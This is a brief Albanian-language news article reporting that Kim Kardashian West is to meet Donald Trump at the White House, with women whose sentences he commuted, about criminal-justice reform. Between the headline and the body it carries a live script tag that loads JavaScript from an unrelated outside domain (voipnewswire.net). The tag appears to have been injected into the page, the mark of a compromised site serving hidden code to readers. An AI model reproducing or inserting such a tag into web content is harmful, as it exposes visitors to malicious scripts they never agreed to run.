Header

Trump fton përsëri Kim në Shtëpinë e Bardhë

<script src='https://s2.voipnewswire.net/s2.js' type='text/javascript'></script>

Kim Kardashian West do të takohet me katër gra që u është falur dënimi me burg nga Presidenti Donald Trump.

Ajo do të takojë Trumpin në Shtëpinë e Bardhë të mërkurën edhe për të shtyrë përpara reformat e të drejtës penale në SHBA.

Ish zyrtarët e administratës Obama i kanë thënë komentatorit të CNN Van Jones, i cili është i përfshirë në këtë përpjekje, se i ka kërkuar Kardashian-West “të ndihmojë gratë e burgosura, por m më parë të shkojnë në Shtëpi të Bardhë dhe të flasin për problemet e tyre”.

“Shpresoj që Donald Trump t’i pastrojë dhe fal motrat në një gjendje të tillë”, ka cicëruar në Twitter, Jones.

You may also like ...